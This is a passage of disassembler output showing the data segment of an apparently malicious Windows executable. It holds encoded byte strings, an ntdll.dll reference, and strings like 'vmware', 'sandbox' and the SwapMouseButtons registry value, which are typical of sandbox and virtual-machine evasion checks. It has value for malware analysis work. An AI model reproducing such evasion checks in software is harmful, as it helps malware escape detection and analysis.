aR_3 db '' ; DATA XREF: sub_401D60+238�o
; sub_402150+65F�o ...
db 0F8h, 28h, 96h
dd 14C7307h, 0CD67FD89h, 0
; char aE_2[]
aE_2 db '
' ; DATA XREF: sub_401D60+24C�o
; sub_402150+697�o ...
db 0F8h, 3Bh, 8Ch
dd 4507304h, 43E98Dh
; char aE_3[]
aE_3 db '
' ; DATA XREF: sub_401D60+260�o
; sub_402150+6CF�o ...
db 0F8h, 3Bh, 92h
dd 364C7301h, 0F96EF1BEh, 2C92FAD3h, 0
; char aE_4[]
aE_4 db '
' ; DATA XREF: sub_401D60+274�o
; sub_402150+707�o ...
db 0F8h, 3Bh, 80h
dd 2A4D7918h, 7BF5A3h
; char LibFileName[]
LibFileName db 'ntdll.dll',0 ; DATA XREF: sub_4018E0+D�o
align 10h
aVmware db 'vmware',0 ; DATA XREF: sub_402E00+F6�o
align 4
aSandbox db 'sandbox',0 ; DATA XREF: sub_402E00+D5�o
aCurrentuser db 'CurrentUser',0 ; DATA XREF: sub_402E00+41�o
a0: ; DATA XREF: sub_402F30+69�o
unicode 0, <0>,0
aSwapmousebutto db 'SwapMouseButtons',0 ; DATA XREF: sub_402F30+56�o
align 4
aControlPanelMo db 'Control Panel\Mouse',0 ; DATA XREF: sub_402F30+30�o
dword_405288 dd 0 ; sub_401D60+1CF�w ...
dword_40528C dd 0 ; sub_401D60+B7�w ...
dword_405290 dd 0 ; sub_401A30+252�r ...
dword_405294 dd 0 ; sub_401D60+7B�w ...
dword_405298 dd 0 ; sub_401D60+8F�w ...
dword_40529C dd 0 ; sub_401D60+1E3�w ...
dword_4052A0 dd 0 ; sub_401D60+366�r
dword_4052A4 dd 0 ; sub_401D60+3C0�r ...
dword_4052A8 dd 0 ; sub_401D60+A3�w ...
dword_4052AC dd 0 ; sub_401D60+CB�w ...
dword_4052B0 dd 0 ; sub_401D60+393�r ...
dword_4052B4 dd 0 ; sub_401D60+DF�w ...
dword_4052B8 dd 0 ; sub_401D60+16B�w ...
dword_4052BC dd 0 ; sub_401D60+F3�w ...
dword_4052C0 dd 0 ; sub_401D60+67�w ...
dword_4052C4 dd 0 ; sub_401D60+38A�r ...
dword_4052C8 dd 0 ; sub_401D60+35D�r
dword_4052CC dd 0 ; sub_401D60+3A5�r ...
dword_4052D0 dd 0 ; sub_401D60+12F�w ...
dword_4052D4 dd 0 ; sub_401D60+36F�r
dword_4052D8 dd 0 ; sub_401D60+11B�w ...
dword_4052DC dd 0 ; sub_401D60+3B7�r ...
dword_4052E0 dd 0 ; sub_401A30+10E�r ...
dword_4052E4 dd 0 ; sub_401A30+1D0�r ...
dword_4052E8 dd 0 ; sub_401D60+3AE�r ...
dword_4052EC dd 0 ; sub_401D60+3C9�r ...
dword_4052F0 dd 0 ; sub_401D60+354�r
dword_4052F4 dd 0 ; sub_401A30+27A�r ...
dword_4052F8 dd 0 ; sub_401D60+39C�r ...
dword_4052FC dd 0 ; sub_401D60+3F�w ...
; char String2[]
String2 dd 40h dup(0) ; DATA XREF: start+F2�o
_data ends
end start